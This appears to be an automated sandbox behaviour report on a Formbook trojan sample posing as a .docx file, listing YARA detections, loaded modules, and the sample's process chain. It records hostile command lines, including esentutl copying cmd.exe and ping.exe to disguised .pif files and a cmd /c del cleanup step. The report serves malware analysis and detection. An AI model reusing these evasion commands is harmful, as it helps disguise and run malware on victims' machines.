          Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe PID: 6928, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: SndVol.exe PID: 2664, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: netsh.exe PID: 4948, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engine Classification label: mal100.troj.evad.winEXE@290/6@14/2
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 7_2_01567F40 DisplayMessageM,FormatMessageW,GetLastError,GetStdHandle,LocalFree,7_2_01567F40
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Code function: 0_2_029A7FD2 GetDiskFreeSpaceA,0_2_029A7FD2
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Code function: 0_2_029BAD98 CreateToolhelp32Snapshot,0_2_029BAD98
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Code function: 0_2_029B6DC8 CoCreateInstance,0_2_029B6DC8
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe File created: C:\Users\Public\Libraries\PNO
          Source: C:\Windows\SysWOW64\SndVol.exe Mutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe ReversingLabs: Detection: 47%
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe File read: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: unknown Process created: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe "C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe"
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rqbnwzgR.cmd" "
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
          Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\SndVol.exe"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rqbnwzgR.cmd" "
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
          Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\SndVol.exe"
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: version.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: url.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ieframe.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: netapi32.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: wkscli.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: sppc.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: apllllphllelp.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ieproxy.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ieproxy.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ieproxy.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: mssip32.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: mssip32.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: mssip32.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: smartscreenps.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: smartscreenps.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: smartscreenps.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: winhttpcom.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: webio.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??????????.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??????????.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??????????.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??l.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??l.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ????.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ???e???????????.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ???e???????????.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??????????.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??l.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??l.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ???.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ???.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ???.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??l.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ????.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??l.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: ??l.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: tquery.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: cryptdll.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: spp.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: vssapi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: vsstrace.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: spp.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: vssapi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: vsstrace.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: mssip32.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: endpointdlp.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: endpointdlp.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: endpointdlp.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: endpointdlp.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: advapi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: advapi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: advapi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: advapi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: advapi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: advapi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: advapi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: spp.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: vssapi.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe Section loaded: vsstrace.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: sppwmi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: sppcext.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: winscard.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: cmdext.dll
          Source: C:\Windows\SysWOW64\esentutl.exe; Section loaded: esent.dll
          Source: C:\Windows\SysWOW64\esentutl.exe; Section loaded: kernel.appcore.dll (2 identical entries)
          Source: C:\Windows\SysWOW64\esentutl.exe; Section loaded: esent.dll
          Source: C:\Windows\SysWOW64\esentutl.exe; Section loaded: kernel.appcore.dll (2 identical entries)
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: dwmapi.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: atlthunk.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: mmdevapi.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: devobj.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: windowscodecs.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: textshaping.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: winmm.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: winmmbase.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: ksuser.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: avrt.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: audioses.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: powrprof.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: umpdc.dll
          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: msacm32.dll
